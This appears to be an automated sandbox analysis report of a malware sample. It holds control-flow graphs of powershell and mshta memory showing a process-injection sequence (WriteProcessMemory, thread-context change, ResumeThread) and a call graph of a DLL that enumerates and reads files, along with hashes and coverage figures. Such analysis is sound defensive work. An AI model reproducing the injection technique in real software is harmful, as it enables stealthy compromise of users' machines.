                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                                                                      • Opcode ID: 60275080eae79e8fe8a26900ed5189d6dde79054714de14f552e8db96680e576
                                                                                                                                                                                                                      • Instruction ID: 0c132d2a86f7c6c58973803ea91cfa2d952b1a51ae4216e80fb34127d12e92b0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60275080eae79e8fe8a26900ed5189d6dde79054714de14f552e8db96680e576
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D931093190CB588FDB18DF9898467F97BE0FB99321F00426FE089D3252CB74A845CB91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 205 7fe8992d515-7fe8992d521 206 7fe8992d523-7fe8992d52b 205->206 207 7fe8992d52c-7fe8992d5b5 205->207 206->207 210 7fe8992d5bf-7fe8992d5f1 Wow64SetThreadContext 207->210 211 7fe8992d5b7-7fe8992d5bc 207->211 212 7fe8992d5f3 210->212 213 7fe8992d5f9-7fe8992d620 210->213 211->210 212->213
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                                                                      • Opcode ID: 6f7294798e9e0a41a9aae942ec551ea4238ac5565a66bbce8c53373895365bf5
                                                                                                                                                                                                                      • Instruction ID: 8e72814e46cce0b08040f0918975559678d4a198d60c6e85ab01c6f8e525357f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f7294798e9e0a41a9aae942ec551ea4238ac5565a66bbce8c53373895365bf5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7341063190CB988FDB16DF688845BE97FE0EB56320F08429BD088C7167D764A809CB92

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 214 7fe89926228-7fe8992d8c0 217 7fe8992d8c2-7fe8992d8c7 214->217 218 7fe8992d8ca-7fe8992d90f WriteProcessMemory 214->218 217->218 219 7fe8992d911 218->219 220 7fe8992d917-7fe8992d941 218->220 219->220
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                                                                      • Opcode ID: e19c79fcb21581085e88634f5b2898b7c2d83b7f03bec85c03a8dbfbb2ed8b6c
                                                                                                                                                                                                                      • Instruction ID: a0fd5fd59ef91d9c2c759a775a8d08fd1a4d6c15ae709c3c3d6d1dae44e1f957
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e19c79fcb21581085e88634f5b2898b7c2d83b7f03bec85c03a8dbfbb2ed8b6c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF31C43091CB588FDB18DF9C98457F97BE4FBA9711F00826FE089D3252CB70A8458B91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 221 7fe899261e8-7fe8992d5b5 224 7fe8992d5bf-7fe8992d5f1 Wow64SetThreadContext 221->224 225 7fe8992d5b7-7fe8992d5bc 221->225 226 7fe8992d5f3 224->226 227 7fe8992d5f9-7fe8992d620 224->227 225->224 226->227
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                                                                      • Opcode ID: 37c25bef211f0bd06aff2a0865f3128abc515dad3c6b23f38f7338c1459cb887
                                                                                                                                                                                                                      • Instruction ID: 8810abe58bbcfad6b47c1bc258bba850f006e3b49662def33ad161dd46473a88
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 37c25bef211f0bd06aff2a0865f3128abc515dad3c6b23f38f7338c1459cb887
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A31F53190CB1C8FDB58DF9CD889BEA7BE5FB59720F04825BD449C3126DB70A9068B91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 228 7fe8992d9e5-7fe8992da89 ResumeThread 231 7fe8992da91-7fe8992daad 228->231 232 7fe8992da8b 228->232 232->231
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                                                                      • Opcode ID: ce53ebc5bf481e156900507b0f19ca2a83c63597e3c1716257b87c3a4a5829fb
                                                                                                                                                                                                                      • Instruction ID: 7ef275238a705fde49e5ad42dc4d63e12fdf61d6a9d90c0e0636392456d454e3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ce53ebc5bf481e156900507b0f19ca2a83c63597e3c1716257b87c3a4a5829fb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B21057190CA4C9FDB59DB58D846BF97BE0FB96320F00421FD089C3662C7716856CB91

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 233 7fe89926258-7fe8992da89 ResumeThread 236 7fe8992da91-7fe8992daad 233->236 237 7fe8992da8b 233->237 237->236
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548000710.000007FE89920000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89920000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe89920000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                                                                      • Opcode ID: 4ae6cf666df1091b2668ac85a26992e6f609b91923a7ab8f646d25f85beec7b9
                                                                                                                                                                                                                      • Instruction ID: 990d6c6a9dd2dc409d2643c752b5eb3a9a1f64dc345eed176e5005d080191bae
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ae6cf666df1091b2668ac85a26992e6f609b91923a7ab8f646d25f85beec7b9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EF21D33090CA4C9FDB58DB58C849BF9BBE0FB65320F10421ED04AD3661C771A426CB91

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b1c29d2957070c2f056ec7b10649ca363d6755d067e9331ae9f6c390d29db866
                                                                                                                                                                                                                      • Instruction ID: e61b166141add97a5f6e9a4dd401d43f131cfe74e2b59cd1278c1b8e4e84f876
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b1c29d2957070c2f056ec7b10649ca363d6755d067e9331ae9f6c390d29db866
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5D12420A0DBC94FE75AA73C98112797FD1EF87254F1901EBD08EC71B3D619A816C392

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 8a8d2dc171a316370f640f9cc79698893edafcb4110b372607e41c1f20257b15
                                                                                                                                                                                                                      • Instruction ID: d95fffec51c2b583470aaf001367e042558e16b771a18ba5e1de18be8d114750
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a8d2dc171a316370f640f9cc79698893edafcb4110b372607e41c1f20257b15
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F513731A2DBC74FE75A932CA85077CBBD1EF65690F2811BAC08EC31B2D624EC658350

                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b8336fb412933c573a57f907f2746a642de8eaed22a6af92bfe7d65df4698eb7
                                                                                                                                                                                                                      • Instruction ID: 7014d78c7fdbcb7ca1706ad73d7a3ef48fb450e6d061c8cc59c6f60137eb1c4a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8336fb412933c573a57f907f2746a642de8eaed22a6af92bfe7d65df4698eb7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E721EA31F1CA994EEB95A32C64162F8F7D2FB99694F5801B7C04EC31B6DA19EC158381
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000E.00000002.548548452.000007FE899F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899F0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7fe899f0000_powershell.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7cc0a021717c43290abeb121464abf221d6e6f150956630a7cd2e6485ae292bb
                                                                                                                                                                                                                      • Instruction ID: cf75fa584add40b0ff3c61ce13efd608192cee12e7c343d3916467e9795f42c7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cc0a021717c43290abeb121464abf221d6e6f150956630a7cd2e6485ae292bb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 90F0E921E0D9DA0EE795A32C24052F4AA81EF55150B1801B7C48EC35B3D914DC244381
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 0000000F.00000003.473532683.0000000003670000.00000010.00000800.00020000.00000000.sdmp, Offset: 03670000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_15_3_3670000_mshta.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                      • Instruction ID: c9026b3e94615e65e1841d6fb273d5184dc00687769aa1ed7d6fabe3a9862035
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                      • Instruction Fuzzy Hash:

                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                      Execution Coverage:6.5%
                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                      Signature Coverage:2.6%
                                                                                                                                                                                                                      Total number of Nodes:1687
                                                                                                                                                                                                                      Total number of Limit Nodes:24
___std_exception_copy 11 API calls 7849->7851 7850->7840 7853 10004fff 7851->7853 7852->7845 7024 10002418 7025 10002420 ___scrt_release_startup_lock 7024->7025 7028 100047f5 7025->7028 7027 10002448 7029 10004804 7028->7029 7030 10004808 7028->7030 7029->7027 7033 10004815 7030->7033 7034 10005b7a _free 19 API calls 7033->7034 7037 1000482c 7034->7037 7035 10002ada _ValidateLocalCookies 5 API calls 7036 10004811 7035->7036 7036->7027 7037->7035 7685 10004a9a 7688 10005411 7685->7688 7689 1000541d _abort 7688->7689 7690 10005af6 _abort 36 API calls 7689->7690 7693 10005422 7690->7693 7691 100055a8 _abort 36 API calls 7692 1000544c 7691->7692 7693->7691 6555 10001c5b 6556 10001c6b ___scrt_fastfail 6555->6556 6559 100012ee 6556->6559 6558 10001c87 6560 10001324 ___scrt_fastfail 6559->6560 6561 100013b7 GetEnvironmentVariableW 6560->6561 6585 100010f1 6561->6585 6564 100010f1 51 API calls 6565 10001465 6564->6565 6566 100010f1 51 API calls 6565->6566 6567 10001479 6566->6567 6568 100010f1 51 API calls 6567->6568 6569 1000148d 6568->6569 6570 100010f1 51 API calls 6569->6570 6571 100014a1 6570->6571 6572 100010f1 51 API calls 6571->6572 6573 100014b5 lstrlenW 6572->6573 6574 100014d2 6573->6574 6575 100014d9 lstrlenW 6573->6575 6574->6558 6576 100010f1 51 API calls 6575->6576 6577 10001501 lstrlenW lstrcatW 6576->6577 6578 100010f1 51 API calls 6577->6578 6579 10001539 lstrlenW lstrcatW 6578->6579 6580 100010f1 51 API calls 6579->6580 6581 1000156b lstrlenW lstrcatW 6580->6581 6582 100010f1 51 API calls 6581->6582 6583 1000159d lstrlenW lstrcatW 6582->6583 6584 100010f1 51 API calls 6583->6584 6584->6574 6586 10001118 ___scrt_fastfail 6585->6586 6587 10001129 lstrlenW 6586->6587 6598 10002c40 6587->6598 6589 10001148 lstrcatW lstrlenW 6590 10001177 lstrlenW FindFirstFileW 6589->6590 6591 10001168 lstrlenW 6589->6591 6592 100011a0 6590->6592 6593 100011e1 6590->6593 6591->6590 6594 100011c7 FindNextFileW 6592->6594 6595 100011aa 6592->6595 6593->6564 6594->6592 6597 
100011da FindClose 6594->6597 6595->6594 6600 10001000 6595->6600 6597->6593 6599 10002c57 6598->6599 6599->6589 6599->6599 6601 10001022 ___scrt_fastfail 6600->6601 6602 100010af 6601->6602 6603 1000102f lstrcatW lstrlenW 6601->6603 6606 100010b5 lstrlenW 6602->6606 6616 100010ad 6602->6616 6604 1000105a lstrlenW 6603->6604 6605 1000106b lstrlenW 6603->6605 6604->6605 6617 10001e89 lstrlenW 6605->6617 6631 10001e16 6606->6631 6609 10001088 GetFileAttributesW 6612 1000109c 6609->6612 6609->6616 6610 100010ca 6611 10001e89 5 API calls 6610->6611 6610->6616 6613 100010df 6611->6613 6612->6616 6623 1000173a 6612->6623 6636 100011ea 6613->6636 6616->6595 6618 10002c40 ___scrt_fastfail 6617->6618 6619 10001ea7 lstrcatW lstrlenW 6618->6619 6620 10001ed1 lstrcatW 6619->6620 6621 10001ec2 6619->6621 6620->6609 6621->6620 6622 10001ec7 lstrlenW 6621->6622 6622->6620 6624 10001747 ___scrt_fastfail 6623->6624 6651 10001cca 6624->6651 6628 1000199f 6628->6616 6629 10001824 ___scrt_fastfail _strlen 6629->6628 6669 100015da 6629->6669 6632 10001e29 6631->6632 6633 10001e4c 6631->6633 6632->6633 6634 10001e2d lstrlenW 6632->6634 6633->6610 6634->6633 6635 10001e3f lstrlenW 6634->6635 6635->6633 6637 1000120e ___scrt_fastfail 6636->6637 6638 10001e89 5 API calls 6637->6638 6639 10001220 GetFileAttributesW 6638->6639 6640 10001235 6639->6640 6641 10001246 6639->6641 6640->6641 6643 1000173a 29 API calls 6640->6643 6642 10001e89 5 API calls 6641->6642 6644 10001258 6642->6644 6643->6641 6645 100010f1 50 API calls 6644->6645 6646 1000126d 6645->6646 6647 10001e89 5 API calls 6646->6647 6648 1000127f ___scrt_fastfail 6647->6648 6649 100010f1 50 API calls 6648->6649 6650 100012e6 6649->6650 6650->6616 6652 10001cf1 ___scrt_fastfail 6651->6652 6653 10001d55 GetFileSize 6652->6653 6658 10001808 6652->6658 6654 10001ede 21 API calls 6653->6654 6655 10001d66 ReadFile 6654->6655 6656 10001d94 CloseHandle 6655->6656 6657 10001d7d CloseHandle 6655->6657 6656->6658 6657->6658 6658->6628 6659 
10001ede 6658->6659 6661 1000222f 6659->6661 6662 1000224e 6661->6662 6663 1000474f _abort 7 API calls 6661->6663 6665 10002250 6661->6665 6677 100047e5 6661->6677 6662->6629 6663->6661 6664 10002908 6666 100035d2 __CxxThrowException@8 RaiseException 6664->6666 6665->6664 6684 100035d2 6665->6684 6668 10002925 6666->6668 6668->6629 6670 1000160c _strcat _strlen 6669->6670 6671 1000163c lstrlenW 6670->6671 6687 10001c9d 6671->6687 6673 10001655 lstrcatW lstrlenW 6674 10001678 6673->6674 6675 10001693 ___scrt_fastfail 6674->6675 6676 1000167e lstrcatW 6674->6676 6675->6629 6676->6675 6683 100056d0 _abort 6677->6683 6678 1000570e 6680 10006368 _free 19 API calls 6678->6680 6679 100056f9 RtlAllocateHeap 6681 1000570c 6679->6681 6679->6683 6680->6681 6681->6661 6682 1000474f _abort 7 API calls 6682->6683 6683->6678 6683->6679 6683->6682 6686 100035f2 RaiseException 6684->6686 6686->6664 6688 10001ca6 _strlen 6687->6688 6688->6673 6689 100020db 6690 100020e7 ___DestructExceptionObject 6689->6690 6691 10002110 dllmain_raw 6690->6691 6695 1000210b 6690->6695 6700 100020f6 6690->6700 6692 1000212a 6691->6692 6691->6700 6702 10001eec 6692->6702 6694 10002177 6696 10001eec 29 API calls 6694->6696 6694->6700 6695->6694 6698 10001eec 29 API calls 6695->6698 6695->6700 6697 1000218a 6696->6697 6699 10002193 dllmain_raw 6697->6699 6697->6700 6701 1000216d dllmain_raw 6698->6701 6699->6700 6701->6694 6703 10001ef7 6702->6703 6704 10001f2a dllmain_crt_process_detach 6702->6704 6705 10001f1c dllmain_crt_process_attach 6703->6705 6706 10001efc 6703->6706 6707 10001f06 6704->6707 6705->6707 6708 10001f01 6706->6708 6709 10001f12 6706->6709 6707->6695 6708->6707 6712 1000240b 6708->6712 6717 100023ec 6709->6717 6725 100053e5 6712->6725 6830 10003513 6717->6830 6722 10002408 6722->6707 6723 1000351e 6 API calls 6724 100023f5 6723->6724 6724->6707 6731 10005aca 6725->6731 6728 1000351e 6803 10003820 6728->6803 6730 10002415 6730->6707 6732 10005ad4 6731->6732 6733 10002410 6731->6733 
6734 10005e08 _abort 10 API calls 6732->6734 6733->6728 6735 10005adb 6734->6735 6735->6733 6736 10005e5e _abort 10 API calls 6735->6736 6737 10005aee 6736->6737 6739 100059b5 6737->6739 6740 100059c0 6739->6740 6741 100059d0 6739->6741 6745 100059d6 6740->6745 6741->6733 6744 1000571e _free 19 API calls 6744->6741 6746 100059ef 6745->6746 6747 100059e9 6745->6747 6749 1000571e _free 19 API calls 6746->6749 6748 1000571e _free 19 API calls 6747->6748 6748->6746 6750 100059fb 6749->6750 6751 1000571e _free 19 API calls 6750->6751 6752 10005a06 6751->6752 6753 1000571e _free 19 API calls 6752->6753 6754 10005a11 6753->6754 6755 1000571e _free 19 API calls 6754->6755 6756 10005a1c 6755->6756 6757 1000571e _free 19 API calls 6756->6757 6758 10005a27 6757->6758 6759 1000571e _free 19 API calls 6758->6759 6760 10005a32 6759->6760 6761 1000571e _free 19 API calls 6760->6761 6762 10005a3d 6761->6762 6763 1000571e _free 19 API calls 6762->6763 6764 10005a48 6763->6764 6765 1000571e _free 19 API calls 6764->6765 6766 10005a56 6765->6766 6771 1000589c 6766->6771 6777 100057a8 6771->6777 6773 100058c0 6774 100058ec 6773->6774 6790 10005809 6774->6790 6776 10005910 6776->6744 6778 100057b4 ___DestructExceptionObject 6777->6778 6785 10005671 RtlEnterCriticalSection 6778->6785 6780 100057e8 6786 100057fd 6780->6786 6782 100057f5 _abort 6782->6773 6783 100057be 6783->6780 6784 1000571e _free 19 API calls 6783->6784 6784->6780 6785->6783 6789 100056b9 RtlLeaveCriticalSection 6786->6789 6788 10005807 6788->6782 6789->6788 6791 10005815 ___DestructExceptionObject 6790->6791 6798 10005671 RtlEnterCriticalSection 6791->6798 6793 1000581f 6794 10005a7f _abort 19 API calls 6793->6794 6795 10005832 6794->6795 6799 10005848 6795->6799 6797 10005840 _abort 6797->6776 6798->6793 6802 100056b9 RtlLeaveCriticalSection 6799->6802 6801 10005852 6801->6797 6802->6801 6804 1000382d 6803->6804 6808 1000384b ___vcrt_freefls@4 6803->6808 6805 1000383b 6804->6805 6809 10003b67 6804->6809 6814 10003ba2 
6805->6814 6808->6730 6819 10003a82 6809->6819 6811 10003b81 6812 10003b99 TlsGetValue 6811->6812 6813 10003b8d 6811->6813 6812->6813 6813->6805 6815 10003a82 try_get_function 4 API calls 6814->6815 6816 10003bbc 6815->6816 6817 10003bd7 TlsSetValue 6816->6817 6818 10003bcb 6816->6818 6817->6818 6818->6808 6820 10003aaa 6819->6820 6822 10003aa6 __crt_fast_encode_pointer 6819->6822 6820->6822 6823 100039be 6820->6823 6822->6811 6828 100039cd try_get_first_available_module 6823->6828 6824 10003a77 6824->6822 6825 100039ea LoadLibraryExW 6826 10003a05 GetLastError 6825->6826 6825->6828 6826->6828 6827 10003a60 FreeLibrary 6827->6828 6828->6824 6828->6825 6828->6827 6829 10003a38 LoadLibraryExW 6828->6829 6829->6828 6836 10003856 6830->6836 6832 100023f1 6832->6724 6833 100053da 6832->6833 6834 10005b7a _free 19 API calls 6833->6834 6835 100023fd 6834->6835 6835->6722 6835->6723 6837 10003862 GetLastError 6836->6837 6838 1000385f 6836->6838 6839 10003b67 ___vcrt_FlsGetValue 5 API calls 6837->6839 6838->6832 6840 10003877 6839->6840 6841 100038dc SetLastError 6840->6841 6842 10003ba2 ___vcrt_FlsSetValue 5 API calls 6840->6842 6847 10003896 6840->6847 6841->6832 6843 10003890 6842->6843 6844 100038b8 6843->6844 6845 10003ba2 ___vcrt_FlsSetValue 5 API calls 6843->6845 6843->6847 6846 10003ba2 ___vcrt_FlsSetValue 5 API calls 6844->6846 6844->6847 6845->6844 6846->6847 6847->6841 7038 1000281c 7041 10002882 7038->7041 7044 10003550 7041->7044 7043 1000282a 7045 1000355d 7044->7045 7048 1000358a 7044->7048 7046 100047e5 ___std_exception_copy 20 API calls 7045->7046 7045->7048 7047 1000357a 7046->7047 7047->7048 7050 1000544d 7047->7050 7048->7043 7051 1000545a 7050->7051 7052 10005468 7050->7052 7051->7052 7057 1000547f 7051->7057 7053 10006368 _free 19 API calls 7052->7053 7054 10005470 7053->7054 7055 100062ac ___std_exception_copy 25 API calls 7054->7055 7056 1000547a 7055->7056 7056->7048 7057->7056 7058 10006368 _free 19 API calls 7057->7058 7058->7054 7854 10004bdd 
7855 10004c08 7854->7855 7856 10004bec 7854->7856 7858 10006d60 49 API calls 7855->7858 7856->7855 7857 10004bf2 7856->7857 7859 10006368 _free 19 API calls 7857->7859 7860 10004c0f GetModuleFileNameA 7858->7860 7861 10004bf7 7859->7861 7862 10004c33 7860->7862 7863 100062ac ___std_exception_copy 25 API calls 7861->7863 7877 10004d01 7862->7877 7864 10004c01 7863->7864 7869 10004c72 7872 10004d01 36 API calls 7869->7872 7870 10004c66 7871 10006368 _free 19 API calls 7870->7871 7876 10004c6b 7871->7876 7874 10004c88 7872->7874 7873 1000571e _free 19 API calls 7873->7864 7875 1000571e _free 19 API calls 7874->7875 7874->7876 7875->7876 7876->7873 7879 10004d26 7877->7879 7881 10004d86 7879->7881 7889 100070eb 7879->7889 7880 10004c50 7883 10004e76 7880->7883 7881->7880 7882 100070eb 36 API calls 7881->7882 7882->7881 7884 10004e8b 7883->7884 7885 10004c5d 7883->7885 7884->7885 7886 1000637b _abort 19 API calls 7884->7886 7885->7869 7885->7870 7887 10004eb9 7886->7887 7888 1000571e _free 19 API calls 7887->7888 7888->7885 7892 10007092 7889->7892 7893 100054a7 __fassign 36 API calls 7892->7893 7894 100070a6 7893->7894 7894->7879 5886 10006d60 5887 10006d69 5886->5887 5888 10006d72 5886->5888 5890 10006c5f 5887->5890 5910 10005af6 GetLastError 5890->5910 5892 10006c6c 5930 10006d7e 5892->5930 5894 10006c74 5939 100069f3 5894->5939 5897 10006c8b 5897->5888 5900 10006cce 5966 1000571e 5900->5966 5904 10006cc9 5963 10006368 5904->5963 5906 10006d12 5906->5900 5972 100068c9 5906->5972 5907 10006ce6 5907->5906 5908 1000571e _free 19 API calls 5907->5908 5908->5906 5911 10005b12 5910->5911 5912 10005b0c 5910->5912 5917 10005b61 SetLastError 5911->5917 5982 1000637b 5911->5982 5975 10005e08 5912->5975 5916 10005b2c 5919 1000571e _free 19 API calls 5916->5919 5917->5892 5921 10005b32 5919->5921 5923 10005b6d SetLastError 5921->5923 5922 10005b48 5996 1000593c 5922->5996 6001 100055a8 5923->6001 5928 1000571e _free 19 API calls 5929 10005b5a 5928->5929 5929->5917 5929->5923 
5931 10006d8a ___DestructExceptionObject 5930->5931 5932 10005af6 _abort 36 API calls 5931->5932 5934 10006d94 5932->5934 5935 10006e18 _abort 5934->5935 5936 100055a8 _abort 36 API calls 5934->5936 5938 1000571e _free 19 API calls 5934->5938 6376 10005671 RtlEnterCriticalSection 5934->6376 6377 10006e0f 5934->6377 5935->5894 5936->5934 5938->5934 6381 100054a7 5939->6381 5942 10006a14 GetOEMCP 5944 10006a3d 5942->5944 5943 10006a26 5943->5944 5945 10006a2b GetACP 5943->5945 5944->5897 5946 100056d0 5944->5946 5945->5944 5947 1000570e 5946->5947 5951 100056de _abort 5946->5951 5949 10006368 _free 19 API calls 5947->5949 5948 100056f9 RtlAllocateHeap 5950 1000570c 5948->5950 5948->5951 5949->5950 5950->5900 5953 10006e20 5950->5953 5951->5947 5951->5948 5952 1000474f _abort 7 API calls 5951->5952 5952->5951 5954 100069f3 38 API calls 5953->5954 5955 10006e3f 5954->5955 5958 10006e90 IsValidCodePage 5955->5958 5960 10006e46 5955->5960 5962 10006eb5 ___scrt_fastfail 5955->5962 5956 10002ada _ValidateLocalCookies 5 API calls 5957 10006cc1 5956->5957 5957->5904 5957->5907 5959 10006ea2 GetCPInfo 5958->5959 5958->5960 5959->5960 5959->5962 5960->5956 6418 10006acb GetCPInfo 5962->6418 5964 10005b7a _free 19 API calls 5963->5964 5965 1000636d 5964->5965 5965->5900 5967 10005752 _free 5966->5967 5968 10005729 HeapFree 5966->5968 5967->5897 5968->5967 5969 1000573e 5968->5969 5970 10006368 _free 17 API calls 5969->5970 5971 10005744 GetLastError 5970->5971 5971->5967 6491 10006886 5972->6491 5974 100068ed 5974->5900 6012 10005c45 5975->6012 5977 10005e2f 5978 10005e47 TlsGetValue 5977->5978 5981 10005e3b 5977->5981 5978->5981 5980 10005e58 5980->5911 6016 10002ada 5981->6016 5987 10006388 _abort 5982->5987 5983 100063c8 5986 10006368 _free 18 API calls 5983->5986 5984 100063b3 RtlAllocateHeap 5985 10005b24 5984->5985 5984->5987 5985->5916 5989 10005e5e 5985->5989 5986->5985 5987->5983 5987->5984 6031 1000474f 5987->6031 5990 10005c45 _abort 4 API calls 5989->5990 5991 
